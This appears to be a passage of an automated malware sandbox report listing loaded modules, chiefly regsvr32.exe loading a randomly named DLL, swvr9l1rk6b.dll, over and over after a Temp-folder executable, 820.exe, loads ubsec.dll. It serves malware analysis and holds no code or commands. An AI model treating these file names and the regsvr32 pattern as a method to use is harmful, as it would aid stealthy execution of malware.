Source: C:\Users\user\AppData\Local\Temp\820.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: swvr9l1rk6b.dll
